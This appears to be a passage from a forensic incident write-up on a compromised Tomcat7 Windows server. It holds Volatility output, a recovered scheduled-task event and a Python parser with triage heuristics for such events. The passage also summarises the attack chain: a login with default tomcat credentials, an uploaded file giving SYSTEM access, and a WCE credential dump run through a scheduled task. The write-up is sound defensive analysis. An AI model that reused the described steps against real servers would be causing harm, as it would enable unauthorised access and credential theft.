0x000000001fa31308 17 1 RWDr-d \Device\HarddiskVolume1\Windows\System32\LogFiles\WMI\RtBackup\EtwRTEventlog-Security.etl
0x000000001fa31b00 1 1 RW---- \Device\HarddiskVolume1\Windows\System32\config\SECURITY.LOG2
0x000000001fa37a60 1 1 RW-r-d \Device\HarddiskVolume1\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Configuration-Wizard%4Operational.etl
0x000000001fa37b08 1 1 RW-r-d \Device\HarddiskVolume1\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Configuration-Wizard%4Diagnostic.etl
$ python vol.py -f $mem --profile=Win2008SP1x86 dumpfiles -Q 0x000000001f1ed2c0 -D /mnt/volatility/DF/tomcat-dump/security-log/
Volatility Foundation Volatility Framework 2.6.1
DataSectionObject 0x1f1ed2c0 None \Device\HarddiskVolume1\Windows\System32\winevt\Logs\Security.evtx
SharedCacheMap 0x1f1ed2c0 None \Device\HarddiskVolume1\Windows\System32\winevt\Logs\Security.evtx
Renamed file.None.0x831ef6a0.vacb to file.None.0x831ef6a0.vacb.evtx, opened it in Event Viewer and filtered on Event ID 4698 (a scheduled task has been created).
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}" />
<EventID>4698</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-06-11T22:13:16.426336000Z" />
<EventRecordID>7273</EventRecordID>
<Correlation />
<Execution ProcessID="608" ThreadID="2268" />
<Channel>Security</Channel>
<Computer>WIN-CEKM08E74HR</Computer>
<Security />
</System>
<EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">WIN-CEKM08E74HR$</Data>
<Data Name="SubjectDomainName">WORKGROUP</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="TaskName">\At1</Data>
<Data Name="TaskContent"><?xml version="1.0" encoding="UTF-16"?>
<Task version="1.0" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo /> <Triggers> <TimeTrigger> <StartBoundary>2015-06-11T18:25:00</StartBoundary> </TimeTrigger> </Triggers> <Principals> <Principal id="Author"> <UserId>@AtServiceAccount</UserId> <LogonType>InteractiveTokenOrPassword</LogonType> <RunLevel>HighestAvailable</RunLevel> </Principal> </Principals> <Actions Context="Author"> <Exec> <Command>c:\windows\12.bat</Command> </Exec> </Actions> </Task></Data>
</EventData>
</Event>
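Event Viewer shows the TaskContent field above as nested XML, but in the serialised event (what `wevtutil qe /f:xml` or an EVTX parser emits) it is an XML-escaped string inside a `<Data>` element, with its own `<?xml ... encoding="UTF-16"?>` declaration. The function below is an added example, not code from the write-up, that parses a 4698 event in that serialised form, unescapes and parses the embedded task definition, and pulls out who registered the task, what it runs, as whom, and when it was due to fire. The sample event is constructed from the one shown on this page (System fields trimmed to the ones used); the "flags" heuristics at the end are my own and are only there to show how such an extractor feeds a triage rule.

```python
import re
import xml.etree.ElementTree as ET
from datetime import datetime

EVT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"

# Constructed from the 4698 event in this write-up, in serialised form: the
# TaskContent value is XML-escaped, as an EVTX-to-XML export emits it.
SAMPLE_EVENT = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}"/>
    <EventID>4698</EventID>
    <TimeCreated SystemTime="2015-06-11T22:13:16.426336000Z"/>
    <EventRecordID>7273</EventRecordID>
    <Channel>Security</Channel>
    <Computer>WIN-CEKM08E74HR</Computer>
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-18</Data>
    <Data Name="SubjectUserName">WIN-CEKM08E74HR$</Data>
    <Data Name="SubjectDomainName">WORKGROUP</Data>
    <Data Name="SubjectLogonId">0x3e7</Data>
    <Data Name="TaskName">\At1</Data>
    <Data Name="TaskContent">&lt;?xml version="1.0" encoding="UTF-16"?&gt;&lt;Task version="1.0" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"&gt;&lt;RegistrationInfo /&gt;&lt;Triggers&gt;&lt;TimeTrigger&gt;&lt;StartBoundary&gt;2015-06-11T18:25:00&lt;/StartBoundary&gt;&lt;/TimeTrigger&gt;&lt;/Triggers&gt;&lt;Principals&gt;&lt;Principal id="Author"&gt;&lt;UserId&gt;@AtServiceAccount&lt;/UserId&gt;&lt;LogonType&gt;InteractiveTokenOrPassword&lt;/LogonType&gt;&lt;RunLevel&gt;HighestAvailable&lt;/RunLevel&gt;&lt;/Principal&gt;&lt;/Principals&gt;&lt;Actions Context="Author"&gt;&lt;Exec&gt;&lt;Command&gt;c:\windows\12.bat&lt;/Command&gt;&lt;/Exec&gt;&lt;/Actions&gt;&lt;/Task&gt;</Data>
  </EventData>
</Event>
"""


def _parse_systemtime(raw):
    """Windows writes 7-9 fractional digits; trim to microseconds for datetime."""
    raw = re.sub(r"(\.\d{1,6})\d*(?=Z$)", r"\1", raw)
    return datetime.fromisoformat(raw.replace("Z", "+00:00"))


def parse_4698(xml_text):
    """Extract the registering subject and the task definition from a 4698 event."""
    e = "{%s}" % EVT_NS
    root = ET.fromstring(xml_text)
    system = root.find(e + "System")
    data = {d.get("Name"): (d.text or "") for d in root.iter(e + "Data")}

    # The embedded task XML declares UTF-16, but we hold it as text already:
    # drop the declaration before handing it to the parser.
    inner = re.sub(r"^\s*<\?xml[^>]*\?>", "", data.get("TaskContent", ""))
    task = ET.fromstring(inner)
    t = "{%s}" % TASK_NS
    info = {
        "event_id": int(system.findtext(e + "EventID")),
        "time_created": _parse_systemtime(system.find(e + "TimeCreated").get("SystemTime")).isoformat(),
        "computer": system.findtext(e + "Computer"),
        "subject_user": data.get("SubjectUserName"),
        "subject_sid": data.get("SubjectUserSid"),
        "task_name": data.get("TaskName"),
        "command": task.findtext(t + "Actions/" + t + "Exec/" + t + "Command"),
        "arguments": task.findtext(t + "Actions/" + t + "Exec/" + t + "Arguments"),
        "run_as": task.findtext(t + "Principals/" + t + "Principal/" + t + "UserId"),
        "run_level": task.findtext(t + "Principals/" + t + "Principal/" + t + "RunLevel"),
        "start_boundary": task.findtext(t + "Triggers/" + t + "TimeTrigger/" + t + "StartBoundary"),
    }

    # Triage heuristics (illustrative, not from the write-up).
    flags = []
    if info["subject_sid"] == "S-1-5-18":
        flags.append("registered by LOCAL SYSTEM (S-1-5-18)")
    if re.fullmatch(r"\\At\d+", info["task_name"] or ""):
        flags.append("legacy at.exe / NetScheduleJobAdd job")
    if info["run_level"] == "HighestAvailable":
        flags.append("runs with highest available privileges")
    if (info["command"] or "").lower().endswith((".bat", ".cmd", ".vbs", ".ps1")):
        flags.append("command is a script")
    info["flags"] = flags
    return info


if __name__ == "__main__":
    for key, value in parse_4698(SAMPLE_EVENT).items():
        print("%-15s %s" % (key, value))
```

The two time values answer different questions: TimeCreated (22:13:16 UTC) is when the task was registered, StartBoundary (18:25:00 local, 22:25 UTC) is when it was due to run, and the pslist output above shows bg.jpg starting at 22:25:00 UTC, which closes the loop.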
Executive Summary
We have a Tomcat7 installation on a Windows 2008 server. Access was gained with default tomcat credentials (tomcat/tomcat). A file was uploaded which provided SYSTEM level access. Windows Credential Editor (WCE) was uploaded, and a scheduled task was created which executed WCE and dumped local credentials into a single file. The attacker downloaded that file remotely, gaining access to the local Administrator account credentials. All attacks took place on 11th June 2015 from the IP 58.64.141.245.